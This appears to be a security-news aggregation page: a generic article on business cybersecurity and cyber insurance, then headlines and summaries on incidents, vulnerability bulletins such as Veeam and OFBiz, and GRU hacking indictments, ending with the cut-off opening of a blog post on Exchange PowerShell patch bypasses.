From small businesses to giant corporations, sophisticated cyberattacks are not just prevalent but effective at crippling data and services. To safeguard your business against these cybersecurity threats, you must take a holistic approach that spans strong security measures such as cyber insurance coverage and protection. Cybersecurity Threats Explained The first part of securing your business is knowing the different cybersecurity threats that can come at you. Common threats include: Phishing Attacks: Cybercriminals take up the guise of trustworthy sources to send fictitious emails and get employees to share sensitive information. Malware: Software intended to damage or disable computer systems on a network. Ransomware: Malicious software that encrypts data and extorts a ransom for its release. Data Breach: A data breach leads to unauthorized access to confidential information, often involving data theft or exposure. DDoS Attacks: Using traffic to overwhelm a service so it cannot function properly. An important part is knowing how these threats can work to devise countermeasures. The proper thing to do in this case is implement strong cybersecurity so your business cannot be hacked. Steps to Implement Strong Cybersecurity 1. Secure Your Network Protect your network from unauthorized access by securing them with firewalls, encryption, and secure Wi-Fi connections. Ensure regular maintenance of your software and hardware to plug areas that cybercriminals can take advantage of. 2. Strong Password Policies Enforce strong password policies that mandate employees to use complex passwords and change them periodically. Urge members to opt for multi-factor authentication (MFA) helping ensure increased security. 3. Regular Software Updates Try to keep everything updated, from operating systems to applications. Scheduled updates usually included patches for potential security risks. 4. Employee Training Train your employees on cybersecurity. Basic instructional courses on how to identify phishing emails, not reuse passwords, and maintain secure practices around software applications can be regularly implemented for a couple of minutes at the beginning before your other critical coursework discussions. 5. Data Encryption This applies to encrypting all sensitive data in transit and at rest. This keeps the data (even if captured in transit) unreadable unless you have that decryption key. 6. Backup Data Regularly Backup your data on an ongoing basis to a secure location If you experience a ransomware attack or data breach, backups also provide options for restoring your info offline instead of paying to retrieve it. 7. Access Control Control exposure to sensitive data by role-based employees follows the principle of least privilege by allowing workers to access only data they need for their job responsibilities. Cyber Security Insurance The importance of having strong cybersecurity defenses in place notwithstanding, planning for failure following a cyberattack is essential as well. Cybersecurity insurance helps address this requirement. There are types of insurance, generally called cyber security insurance or cyber liability insurance, that can be written into a policy to help protect businesses against the impact of these events. This includes the cost of the following things Data Breach Notification: The policy provides coverage for the costs associated with notifying affected parties of a data breach. Legal Fees: These are your costs to have a legal professional represent you and remain in compliance with applicable laws. RanPSW Payments: In case of a ransomware attack, insurance can contribute to the ranPSW recovery. Business Interruption: Payments for lost income resulting from a cyberattack shutting down business operations. Costs of implementing a crisis management plan for public relations to manage the aftermath of a cyber incident. Why is Cyber Security Insurance Needed? Cyberattacks can lead to huge financial losses. Cyber security insurance acts as a financial backstop, resulting in economic protection for your business to recover without breaking the bank. Reputation Management: The reputation of your business is at stake due to a cyberattack. Insurance may cover public relations work to restore trust with customers and stakeholders Maintain peace of mind: With your business being secured by cyber security insurance, know that you can move on to the next challenge such as growth or innovation. Well, having a dedicated developer and following the best programming practices could serve as your shield against security failures (which is not attending quickly enough in case there is an intrusion), even the most knowledgeable programmer should prepare himself on what exactly he will do if his site does get hacked. A clear incident response plan is imperative for dealing with the fallout of a cyber attack. Your plan should include: Preparation: Create a cybersecurity team and conduct regular practice sessions Detection: Set up monitoring to catch possible intruders Contain: Immediately shut down infected systems to prevent the attack from spreading Removal: Take the malware off your network, and patch any security holes Recovery: Return to normal operations by restoring systems, applications, and data from backups Insights Gained: Review the incident and what was learned, to further strengthen corporate defenses against future attacks. Keeping your company secure in the digital era means implementing comprehensive cybersecurity protocols, training employees, and making sure to have cyber security coverage. You can get your business ready for the ever-changing game of cyber threats if you know what to look out for and how to protect yourself! Cybersecurity insurance is one of the best ways to make sure that your business has a backup plan in case things don''t go as planned.

by The Cyber Express

Apache addressed a remote code execution vulnerability affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5) affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache OFBiz® is an open source product for the automation of enterprise processes that includes framework components and business […]

by Security Affairs

Tewkesbury Borough Council has declared a major incident following a cyberattack that disrupted its operations on Wednesday afternoon. The Tewkesbury Borough Council prompted the council to take immediate action by shutting down its systems to contain the Tewkesbury Borough Council cyberattack.  As the investigation unfolds, the council''s Chief Executive, Alistair Cunningham, has reassured the public that there is currently no evidence of data being removed or exfiltrated from their systems. Tewkesbury Borough Council Cyberattack: Immediate Response and Ongoing Investigation Upon discovering the Tewkesbury Borough Council cyberattack, Tewkesbury Borough Council enacted ""necessary cyber response steps"" to address the situation. The council''s action included shutting down all systems to prevent further potential damage.  An ongoing investigation is being conducted with assistance from the National Cyber Security Centre and the counter-fraud agency. The council has emphasized that there is no indication of personal data being compromised at this time. In an official statement, the council provided precautionary advice to residents and customers, urging them to remain vigilant. The advisory highlights the importance of being cautious of phishing emails and fraudulent activities, using strong and unique passwords, and promptly changing passwords if any suspicious activity is detected. The council also recommended checking further guidance available on the National Cyber Security Centre''s website. Public Communication and Support In a statement to BBC Radio Gloucestershire, Cunningham detailed the discovery of unknown user accounts within the council’s system, which led to the immediate system shutdown. He confirmed that there was no evidence suggesting that data had been removed or exfiltrated. Cunningham stressed that the primary focus is on ensuring services for vulnerable residents while investigating the extent of the Tewkesbury Borough Council cyberattack. ""We have now re-established our phone line and are working on building new computers to expand our phone line capabilities,"" Cunningham said. He also pointed out that although the council''s website remains operational and unaffected, normal services are limited. I don''t want someone who''s at risk of losing their house or who can''t feed their children not to be able to talk to my staff,"" Cunningham added. To assist residents, council staff will be available at several locations: Bishop’s Cleeve Parish Council until 15:00 BST Churchdown police bus at Tesco car park until 16:00 BST Brockworth Community Centre at Court Road until 16:00 BST Data Protection and Community Assurance The council has appointed Graeme Simpson as the Data Protection Officer to handle inquiries related to the cyberattack on Tewkesbury Borough Council. Residents concerned about the data breach can contact Simpson via the email address provided in the council''s communication. Despite the current challenges, the council is committed to providing updates and ensuring that residents are informed of any potential risks to their data. As part of its ongoing response, the council continues to work diligently to understand the full scope of the cyberattack. ""We do not know the extent of the infiltration of our system,"" Cunningham admitted. He emphasized the importance of not reopening all services until a thorough assessment is completed, citing that waste and recycling services remain operational during this period. The Cyber Express reached out to Tewkesbury Borough Council for further details on the cyberattack. As of now, no additional official statements have been provided. 

by The Cyber Express

Our new report investigates cyberthreats aimed at child gamers.

by Kaspersky

Veza announced a partnership with HashiCorp to deliver an integrated solution for solving modern identity security challenges. Together, the Veza Access Platform and HashiCorp Vault empower joint customers to strengthen their identity security posture by bringing least privilege to the management of secrets and keys. With cloud and SaaS investments maturing rapidly, coupled with the advent of new technologies like Generative AI (GenAI), the complexity of enterprise environments has created a significant challenge for security … More → The post Veza and HashiCorp join forces to help prevent credential exposure appeared first on Help Net Security.

by Help Net Security

Avis Car Rental has reported a data breach affecting customers'' personal information after an unauthorized party accessed one of its business applications. The breach occurred between August 3 and August 6, 2024, compromising customer data, including names and other sensitive details. Avis says it has since contained the breach, launched an investigation with cybersecurity experts, … The post Avis Car Rental Suffers Data Breach Exposing Customer Information appeared first on CyberInsider.

by Cyber Insider

The US Securities and Exchange Commission (SEC) has accused a former CIRCOR executive of misleading financial disclosures. The allegations revolve around false statements made regarding the company''s finances. This case highlights the importance of accurate and transparent financial reporting. The U.S. The SEC has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. Bowerman is accused of misleading financial disclosures, specifically making false statements about the company''s finances. This case emphasizes the significance of precise and transparent financial reporting practices. (SEC) announced that it has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. According to the SEC, Bowerman’s fraudulent activities led to misleading financial disclosures by the company from 2019 through 2021, impacting CIRCOR’s public financial statements. The SEC also revealed that CIRCOR has settled related internal accounting charges, citing deficiencies in its financial controls that contributed to the situation. The Allegations Against Bowerman Bowerman, who was employed at Pipeline Engineering, a U.K.-based business unit of CIRCOR, is accused of engaging in a range of fraudulent practices over two years. The SEC’s complaint asserts that between 2019 and 2021, Bowerman manipulated Pipeline Engineering’s internal financial records, leading to inaccurate figures being incorporated into CIRCOR’s consolidated financial statements. To carry out his fraudulent actions, Bowerman is alleged to have taken multiple deceptive steps, including manipulating account reconciliations, falsifying certifications, fabricating bank confirmation documents, and actively misleading CIRCOR’s senior management and external auditors. The SEC claims that these efforts concealed the true financial position of the business unit and resulted in CIRCOR’s public financial disclosures overstating its performance by millions of dollars for fiscal years 2019 and 2020, as well as for the nine-month period ending on October 3, 2021. CIRCOR’s Internal Control Failures In addition to the charges against Bowerman, the SEC’s findings also highlight broader issues within CIRCOR’s internal accounting systems. According to the SEC’s order, the company lacked sufficient internal controls to properly oversee its financial statement preparation, account reconciliation processes, and access to bank accounts. These gaps in oversight allowed Bowerman’s fraudulent activities to go undetected for an extended period. The SEC’s investigation revealed that CIRCOR’s inability to detect Bowerman’s misconduct contributed to the company’s overstated financial performance during the two-year period in question. The company was found to have violated the federal securities laws’ financial reporting, books and records, and internal accounting controls provisions. CIRCOR’s Response and Remedial Measures In response to the discovery of the fraudulent activities, CIRCOR took immediate action. The company self-reported the financial reporting violations to the SEC shortly after launching its own internal investigation. This proactive cooperation played a significant role in mitigating the SEC’s enforcement actions against CIRCOR. The SEC acknowledged CIRCOR’s extensive cooperation throughout the investigation, noting that the company provided detailed examples of Bowerman’s unauthorized financial adjustments, shared summaries of interviews with witnesses based outside the U.S., and made its employees and external forensic accountants available for questioning. The company also promptly implemented a range of remedial measures to address the identified deficiencies in its internal controls. Key actions taken by CIRCOR included: Strengthening its internal accounting controls. Hiring additional experienced finance and accounting personnel. Cancelling compensation that was scheduled to be paid to a former executive officer. These actions, coupled with CIRCOR’s cooperation with the SEC, led the Commission to decide against seeking a civil penalty against the company. According to Nicholas P. Grippo, Director of the SEC’s Philadelphia Regional Office, “While this matter involves serious violations of the securities laws, once the company became aware of the violations, it promptly self-reported, cooperated, and remediated the gaps in its accounting systems. As also reflected in other recent Commission resolutions, this kind of response by a corporate entity can lead to significant benefits including, as here, no penalty.” Charges Against Bowerman While CIRCOR has settled its case with the SEC, Bowerman faces a more severe set of legal consequences. The SEC has filed a complaint in the U.S. District Court for the District of Massachusetts, charging Bowerman with violations of multiple provisions of the federal securities laws, including those related to antifraud, financial reporting, books and records, and internal accounting controls. The SEC is seeking various forms of relief from Bowerman, including: Injunctive relief to prevent him from engaging in further securities law violations. Disgorgement of any ill-gotten gains, along with prejudgment interest. Civil penalties to further hold Bowerman accountable for his actions. These charges reflect the seriousness of Bowerman’s alleged misconduct, which undermined the integrity of CIRCOR’s financial disclosures and harmed investors who relied on the company’s public filings. As part of the SEC’s final order against CIRCOR, the company has agreed to cease and desist from future violations of the charged provisions of the securities laws.

by The Cyber Express

The U.S. government has indicted five Russian military intelligence officers from the GRU and one civilian for their role in a series of cyberattacks on Ukraine and NATO countries. In connection with this, the U.S. Department of State is offering a reward of up to $10 million for any information leading to their capture or … The post U.S. Offers $10M for Info on Five State-Backed Russian Hackers appeared first on CyberInsider.

by Cyber Insider

The United States and its allies state that Russia-linked threat actors operating under the GRU are behind global critical infrastructure attacks. The FBI, CISA, and NSA linked threat actors from Russia’s GRU Unit 29155 to global cyber operations since at least 2020. These operations include espionage, sabotage, and reputational damage. The United States and its […]

by Security Affairs

Veeam has published a new Security Bulletin addressing multiple critical vulnerabilities across its suite of products. The Veeam security bulletin, identified as KB ID: 4649, includes updates on Veeam Backup & Replication, Veeam ONE, Veeam Service Provider Console, Veeam Agent for Linux, Veeam Backup for Nutanix AHV, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. The security issues detailed in this bulletin highlight several high-severity vulnerabilities that could impact the security and functionality of Veeam’s solutions. This article provides a short glimpse into these updates offered by the Veeam security bulletin.  Key Highlights from the Veeam Security Bulletin Here''s a detailed look at the vulnerabilities discovered and their respective fixes: 1. Veeam Backup & Replication Several vulnerabilities affecting Veeam Backup & Replication 12.1.2.172 and earlier versions have been reported. These vulnerabilities include: CVE-2024-40711: This critical vulnerability allows unauthenticated remote code execution (RCE). Discovered by Florian Hauser of CODE WHITE GmbH, it carries a CVSS v3.1 score of 9.8. CVE-2024-40713: A high-severity vulnerability enabling a low-privileged user to alter Multi-Factor Authentication (MFA) settings, thus bypassing MFA. It has a CVSS v3.1 score of 8.8. CVE-2024-40710: This series of high-severity vulnerabilities allow remote code execution (RCE) under the service account and extraction of sensitive information. It also scores 8.8 on the CVSS v3.1 scale. CVE-2024-39718: Allows low-privileged users to remotely delete files on the system with service account permissions. It holds a CVSS v3.1 score of 8.1. CVE-2024-40714: A high-severity vulnerability in TLS certificate validation can let an attacker intercept sensitive credentials during restore operations, scoring 8.3 on the CVSS v3.1 scale. CVE-2024-40712: This path traversal vulnerability permits local privilege escalation (LPE) for an attacker with low-privileged access. It carries a CVSS v3.1 score of 7.8. The solutions for these issues are included in Veeam Backup & Replication version 12.2 (build 12.2.0.334). 2. Veeam Agent for Linux For Veeam Agent for Linux, version 6.1.2.178 and earlier are affected by: CVE-2024-40709: This high-severity vulnerability enables local privilege escalation to the root level and scores 7.8 on the CVSS v3.1 scale. This issue is resolved in Veeam Agent for Linux version 6.2 (build 6.2.0.101), which is included with Veeam Backup & Replication 12.2. 3. Veeam ONE Veeam ONE 12.1.0.3208 and earlier versions are affected by several vulnerabilities: CVE-2024-42024: Allows remote code execution on the Veeam ONE Agent machine with possession of service account credentials. It has a CVSS v3.1 score of 9.1. CVE-2024-42019: Grants access to the NTLM hash of the Veeam Reporter Service account, requiring user interaction. It scores 9.0 on the CVSS v3.1 scale. CVE-2024-42023: Enables low-privileged users to execute code with Administrator privileges remotely, with a severity score of 8.8. CVE-2024-42021: Allows attackers with valid access tokens to access saved credentials, scoring 7.5 on the CVSS v3.1 scale. CVE-2024-42022: Allows modification of product configuration files, also scoring 7.5. CVE-2024-42020: HTML injection vulnerability in Reporter Widgets, scoring 7.3. These vulnerabilities are addressed in Veeam ONE v12.2 (build 12.2.0.4093). 4. Veeam Service Provider Console The Veeam Service Provider Console (VSPC) 8.0.0.19552 and earlier versions have been identified with: CVE-2024-38650: A critical vulnerability permitting low-privileged attackers to access the NTLM hash of the service account on the VSPC server, scoring 9.9 on the CVSS v3.1 scale. CVE-2024-39714: Allows low-privileged users to upload arbitrary files, leading to remote code execution on the VSPC server. This issue also scores 9.9. CVE-2024-39715: Similar to CVE-2024-39714 but through REST API access, with a high severity score of 8.5. CVE-2024-38651: Allows low-privileged users to overwrite files, leading to remote code execution, with a CVSS v3.1 score of 8.5. The fixes are included in Veeam Service Provider Console v8.1 (build 8.1.0.21377). 5. Veeam Backup for Nutanix AHV and Other Plug-Ins Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 and earlier, as well as Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45, are impacted by: CVE-2024-40718: Allows local privilege escalation through an SSRF vulnerability, with a severity score of 8.8 on the CVSS v3.1 scale. These issues are resolved in Veeam Backup for Nutanix AHV Plug-In v12.6.0.632 and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299, both included with Veeam Backup & Replication 12.2. Conclusion This comprehensive Veeam Security Bulletin outlines critical updates and fixes for multiple Veeam products. Users are advised to update to the latest versions of Veeam Backup & Replication, Veeam Agent for Linux, Veeam ONE, Veeam Service Provider Console, and other related products to mitigate these vulnerabilities. Regular updates and vigilant security practices remain essential in protecting against potential threats and ensuring the integrity of data protection solutions.

by The Cyber Express

The United States, along with its allies, has formally identified a group of Russian hackers, tracked under names like Cadet Blizzard and Ember Bear, as being responsible for large-scale attacks on the US global critical infrastructure. These hackers are linked to Unit 29155 of Russia''s Main Directorate of the General Staff of the Armed Forces (GRU), a military intelligence unit that has long been under scrutiny for its covert operations. In a joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA), it was revealed that the GRU hackers, often junior officers from GRU’s 161st Specialist Training Center, have been involved in cyber sabotage since 2020, with the leadership and oversight of the experienced members of Unit 29155. These operations have not only targeted critical infrastructure but also carried out sabotage and assassination attempts throughout Europe. WhisperGate Malware and Cyberattacks The group gained significant notoriety in January 2022 when they deployed WhisperGate, a data-wiping malware, against Ukrainian organizations. The attacks were part of a broader campaign aimed at destabilizing Ukraine and interfering with the efforts of NATO and allied nations to support the country. This malware was a signal of the hackers'' capabilities, marking a shift from cyber-espionage to outright data destruction. WhisperGate attacks began on January 13, 2022, focusing on disrupting Ukraine’s defense and critical services. The joint advisory emphasizes that Unit 29155 is distinct from other well-known GRU-affiliated units, such as Units 26165 and 74455, which were responsible for previous cyberattacks in Europe and the U.S. Since early 2022, this group has pivoted its focus toward disrupting aid efforts for Ukraine, expanding its cyber toolkit to include methods that blend espionage with destruction. The joint advisory stresses that the hackers are honing their technical skills and building their experience by conducting more advance cyber operations across various global regions. Unit 29155: A Wide Range of Attacks Across Continents According to U.S. intelligence, Unit 29155 has been responsible for a wide range of cyberattacks that have affected NATO countries, along with others in North America, Europe, Latin America, and Central Asia. Their tactics have included website defacement, public leaks of stolen data, and extensive infrastructure scanning to uncover vulnerabilities. These attacks have not been limited to Ukraine but have spread across multiple sectors, including energy, government services, and financial institutions. As a result, critical infrastructure across NATO member states has faced increasing risks of being compromised. The FBI has been tracking the activities of Unit 29155 closely, having detected over 14,000 domain scanning attempts targeting at least 26 NATO members and several European Union (EU) nations. These scans were aimed at identifying weaknesses in critical systems that could be exploited in future attacks. U.S. Offers Reward for Key GRU Officers In response to these attacks, the U.S. State Department announced a reward of up to $10 million for information leading to the identification or capture of five Russian military intelligence officers. These individuals are believed to be part of the GRU''s Unit 29155 and include Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin. [caption id=""attachment_89265"" align=""aligncenter"" width=""1024""] Source: X[/caption] These officers are accused of carrying out cyber operations that have harmed critical U.S. infrastructure, with particular emphasis on energy, government, and aerospace sectors. Their cyber activities are linked to the sabotage of Western countries’ efforts to support Ukraine and disrupt various sectors critical to national security. In addition to the military officers, a civilian named Amin Timovich has also been indicted for his involvement in the WhisperGate attacks against Ukraine. This indictment, along with charges against the five GRU officers, highlights the seriousness of Russia’s cyber operations and the coordinated efforts to bring those responsible to justice. [caption id=""attachment_89266"" align=""aligncenter"" width=""739""] Source: X[/caption] Protecting Critical Infrastructure: Recommendations As Unit 29155 continues its cyber operations across the globe, organizations within critical infrastructure sectors are urged to enhance their defenses. Immediate actions recommended by cybersecurity authorities include: Patching vulnerabilities in systems to close potential entry points for cyberattacks. Implementing phishing-resistant multifactor authentication (MFA) to strengthen account security, particularly for services like webmail and virtual private networks (VPNs). Segmenting networks to contain any malicious activity should an intrusion occur. These defensive strategies are especially important for organizations within sectors frequently targeted by Russian hackers, including energy, transportation, healthcare, and government services. Global Concerns and Long-Term Implications Since Russia’s invasion of Ukraine in February 2022, cyberattacks have escalated in both scale and severity. Alongside the WhisperGate malware, other destructive tools like HermeticWiper and ransomware decoys have been used to cripple Ukrainian systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warned early on that such malware could easily spread beyond Ukraine, affecting global systems if defenses were not adequately prepared. Wednesday’s announcement of the U.S. seizing 32 web domains linked to Russian disinformation campaigns highlights the broader cyber and information warfare being waged by Russia. These domains were part of a network aimed at spreading false information to influence the upcoming 2024 U.S. presidential election. Tracking Cyber Threats: Industry and Government Coordination The cybersecurity industry plays a critical role in identifying and mitigating threats posed by groups like Unit 29155. Leading cybersecurity firms and government agencies continuously track the activities of Russian cyber actors, with various naming conventions such as Cadet Blizzard (tracked by Microsoft) and Ember Bear (CrowdStrike). These cyber groups have demonstrated advanced capabilities in reconnaissance, scanning, and exploiting vulnerabilities in critical systems. As Unit 29155 continues its cyber operations, the global community remains on high alert. Efforts to strengthen critical infrastructure and improve cyber defenses have never been more critical. While the hunt for the Russian GRU officers involved in these attacks intensifies, the larger challenge remains how to effectively mitigate and defend against the growing cyber threats facing the world today.

by The Cyber Express

I asked for a calm August 2024 Patch Tuesday in last month’s forecast article and that came to pass. The updates released were limited to the regular operating systems and all forms of Office applications. Six zero-day vulnerabilities were announced, with five in the operating systems and one in the Office applications. There were 63 CVEs addressed in the Windows 10 operating systems and associated servers and 55 CVEs addressed in Windows 11. Overall, it … More → The post September 2024 Patch Tuesday forecast: Downgrade is the new exploit appeared first on Help Net Security.

by Help Net Security

Businesses run on SaaS solutions: nearly every business function relies on multiple cloud-based tech platforms and collaborative work tools like Slack, Google Workspace apps, Jira, Zendesk and others. We recently surveyed security leaders and CISOs on top data security priorities and challenges. We discovered that over 70% work in organizations using 50 or more SaaS solutions, and nearly a third of the respondents reported their organization’s SaaS environments include 200 or more apps. With so … More → The post Human firewalls are essential to keeping SaaS environments safe appeared first on Help Net Security.

by Help Net Security

Respotter is an open-source honeypot designed to detect attackers when they launch Responder within your environment. This application identifies active instances of Responder by exploiting its behavior when responding to any DNS query. Respotter leverages LLMNR, mDNS, and NBNS protocols to query a non-existent hostname (default: Loremipsumdolorsitamet). If any of these requests receive a response, Responder is likely operating on your network. Respotter can send webhooks to Slack, Teams, or Discord. It also supports sending … More → The post Respotter: Open-source Responder honeypot appeared first on Help Net Security.

by Help Net Security

As cybercriminals continue to refine their methods, blending traditional strategies with new technologies, the financial toll on individuals and organizations has reached alarming levels. Businesses are also grappling with mounting cybercrime costs from ransomware and DDoS attacks, which can inflict hundreds of thousands of dollars in damage within minutes. These statistics highlight a growing concern: as cybercrime costs rise and threats become more complex and widespread, they impact organizations of all sizes. Old methods, new … More → The post The true cost of cybercrime for your business appeared first on Help Net Security.

by Help Net Security

Ransomware is an all-too-common occurrence: 83% of organizations have experienced at least one ransomware attack in the last year, 46% of respondents experienced four or more and 14% indicated they experienced 10 or more. Of those respondents who experienced at least one ransomware attack in the last year, 61% said it resulted in downtime of at least 24 hours, according to Onapsis. Source: Onapsis Of those organizations that experienced ransomware attacks, 89% said their Enterprise … More → The post 83% of organizations experienced at least one ransomware attack in the last year appeared first on Help Net Security.

by Help Net Security

Here’s a look at the most interesting products from the past week, featuring releases from Binarly, Bitdefender, Prompt Security, Revenera, Skyhigh Security, and Vanta. Bitdefender Security for Creators protects YouTube content creators and influencers from hackers Bitdefender Security for Creators safeguards content channels and social media accounts from takeovers and supports Windows, Mac, Android, and iOS. Set-up takes a few moments and connects to both content channel and owner. Once activated, Bitdefender continuously monitors for … More → The post New infosec products of the week: September 6, 2024 appeared first on Help Net Security.

by Help Net Security

Using this maturity model, security teams can make structured, measurable, and iteritive improvements to their detection engineering teams..

by Elastic Security Lab

RansomHub claims to have breached Intermountain Planned Parenthood, stealing 93GB of data. The healthcare provider is investigating the…

by Hackread

New threats, an overburdened workforce, and regulatory pressures mean cloud service providers need a more resilient model than the shared responsibility framework. That''s where "shared fate" comes in.

by Dark Reading

Unnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023. ""Sighting this group''s [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them,"" Kaspersky

by The Hacker News

Veeam has shipped security updates to address a total of 18 security flaws impacting its software products, including five critical vulnerabilities that could result in remote code execution. The list of shortcomings is below - CVE-2024-40711 (CVSS score: 9.8) - A vulnerability in Veeam Backup & Replication that allows unauthenticated remote code execution. CVE-2024-42024 (CVSS score: 9.1

by The Hacker News

by Dark Reading

Security researchers have discovered a cryptographic flaw that leaves the YubiKey 5 vulnerable to attack.

by WIRED Security News

Retail employees are being duped into divulging their credentials by typosquatting malvertisements.

by Dark Reading

In the past, the group has targeted different sectors in East and Southeast Asia, but recently has pivoted its focus to the Middle East, specifically to entities that publish human rights studies.

by Dark Reading

Singapore''s health minister discusses aging populations and how AI can prepare nations for the inevitable.

by ZDNET Security

The malware, KTLVdoor, has already been found on more than 50 command-and-control servers and enables full control of any environment it compromises.

by Dark Reading

Veeam addressed 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. Veeam security updates to address multiple vulnerabilities impacting its products, the company fixed 18 high and critical severity flaws in Veeam Backup & Replication, Service Provider Console, and One. The most severe flaw included in the September 2024 security bulletin is a critical, […]

by Security Affairs

Working with the Treasury and Justice departments, the president has sanctioned anti-democratic Russian adversaries.

by Dark Reading

The post KnowBe4 Children’s Interactive Cybersecurity Activity Kit appeared first on National Cybersecurity Alliance.

by National Cybersecurity Alliance

The U.S. government indictment demonstrated deep knowledge of the Russian spies'' activities, including their real-world meetings at a cafe in Moscow. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

A secretive Russian military unit, previously linked to assassinations and destabilization in Europe, is blamed for destructive wiper malware attacks in Ukraine. The post Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage appeared first on SecurityWeek.

by SecurityWeek

Planned Parenthood confirms ""cybersecurity incident"" as RansomHub ransomware gang threatens to leak 93 Gb of data stolen from the nonprofit last week. The post Ransomware Gang Claims Cyberattack on Planned Parenthood appeared first on SecurityWeek.

by SecurityWeek

In my opinion, mandatory enrollment is best enrollment.

by Cisco Talos Blog

The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions. Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA),

by The Hacker News

Apache has fixed a critical security vulnerability in its open-source OFBiz (Open For Business) software, which could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers. [...]

by BleepingComputer

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-207A) published on August 29, 2024, that disseminates known RansomHub ransomware IOCs and TTPs that have been identified through FBI threat response activities and third-party reporting as recently as August 2024. The post Response to CISA Advisory (AA24-242A): #StopRansomware: RansomHub Ransomware appeared first on AttackIQ.

by AttackIQ

State-backed attackers and commercial surveillance vendors repeatedly using N-day exploits to target known vulnerabilities in devices.  The post Preventing Infections of N-Day Exploits Delivered via Malicious Websites appeared first on Zimperium.

by Zimperium

Businesses can amplify their digital transformation to enhance value through five key elements: business agility, transparency and validation of outcomes, ease of inclusion, augmented analysis, and AI.

by ITPro Today

Unit 29155 of Russia’s GRU military intelligence agency—a team responsible for coup attempts, assassinations, and bombings—has branched out into brazen hacking operations with targets across the world.

by WIRED Security News

Microsoft announced today that it has partnered with StopNCII to proactively remove harmful intimate images and videos from Bing using digital hashes people create from their sensitive media. [...]

by BleepingComputer

Starting October 2024, WordPress requires plugin and theme authors to enable two-factor authentication (2FA) and use SVN-specific passwords…

by Hackread

The Light We Keep documentary tells the story of the consequences of electronic warfare in Ukraine and its effect on power grids across the country.

by Cisco Talos Blog

Passwords and secrets management organisation Keeper Security has earned the distinction of Value Leader in the latest Enterprise Management Associates (EMA) 2024 Privileged Access Management (PAM) Radar™ Report for the second year in a row. The report highlights KeeperPAM – the company’s unified, end-to-end encrypted, zero-trust PAM platform – for its exceptional performance in managing […] The post Keeper Security Named a Value Leader in EMA’s 2024 PAM Radar™ Report appeared first on IT Security Guru.

by IT Security Guru

The GRC Group (“GRC” or the “Group“), a leading provider of software and tech-enabled services to manage business risks and regulatory compliance, has today acquired Pentest People Ltd (“Pentest People”). The GRC Group is focused on building market-leading positions in select areas of the governance, risk and compliance market, and the acquisition of Pentest People […] The post The GRC Group Strengthens Cybersecurity Offering with Acquisition of Pentest People, Expanding Its Global Reach and Expertise appeared first on IT Security Guru.

by IT Security Guru

You only have to take a look at the latest headlines to see that ransomware is still having a significant impact on organizations of all sizes across a wide variety of industries. The threat is evolving, though.

by Barracuda

With 20,000 internet providers across the country, the technical challenges of blocking X in Brazil mean some connections are slipping through the cracks.

by WIRED Security News

As you may know, I recently presented my Exchange-related talk during OffensiveCon 2024. This series of four blog posts is meant to supplement the talk and provide additional technical details. For those who did not attend OffensiveCon, you can also watch the full talk here: “Half Measures and Full Compromise: Exploiting Microsoft Exchange PowerShell Remoting”. This blog post covers the part from 12:05 to 18:10. In this article, part one of the series, I describe the MultiValuedProperty exploitation primitive, which became fundamental for my further exploitation of Exchange PowerShell. I also present a bypass for Microsoft’s first patch for this vulnerability, accomplished by chaining MultiValuedProperty with the Command class. Introduction You might already be familiar with the Exchange ProxyNotShell chain, CVE-2022-41040 and CVE-2022-41082. It allowed any authenticated Exchange user to achieve remote code execution. ProxyNotShell was exploited in the wild before Microsoft released a patch. I described the ProxyNotShell chain, especially its RCE vector, in this blog post. Before proceeding with this post, please make sure that you are familiar with the original issue, as this article will focus on bypassing the patches. In this blog post, I would like to start with 2 RCE vulnerabilities: • ZDI-23-163/ CVE-2023-21529 – abuse of the allowed MultiValuedProperty class.• ZDI-23-881/ CVE-2023-32031 – bypass for CVE-2023-21529, abuse of not blocked Command class. Accessing PowerShell Without ProxyShell Path Confusion The original path confusion vulnerability, CVE-2021-34473, was discovered by Orange Tsai. He used it together with CVE-2021-34523 and CVE-2021-31207 to achieve pre-auth remote code execution, forming the chain known as ProxyShell. Microsoft’s original patch for the path confusion did not eliminate the root of the problem, but instead placed it behind authentication. After the patch, it was exploited in the wild for post-auth remote code execution using the ProxyNotShell chain mentioned above. Exploitation of the path confusion allowed a threat actor to reach the Exchange PowerShell backend by sending HTTP requests to the autodiscover endpoint. After the patch for ProxyNotShell, it appears that this attack vector is completely blocked, though I must admit that I have never fully verified that patch. Nonetheless, a low-privileged attacker still has direct access to Exchange PowerShell Remoting, subject to Kerberos authentication. This is because every Exchange user can trigger some Exchange PowerShell cmdlets, such as Get-Mailbox. Instructions that describe direct interaction with the Exchange PowerShell can be found here. As Kerberos authentication is required, this attack surface is probably restricted to internal attackers, which is to say, attackers who are already present in the organization’s network. There remains plenty of reason for concern, though. It would not be good if any domain account (and organization member) could escalate to SYSTEM on the Exchange server. Patch for the ProxyNotShell CVE-2022-41082 RCE CVE-2022-41082, 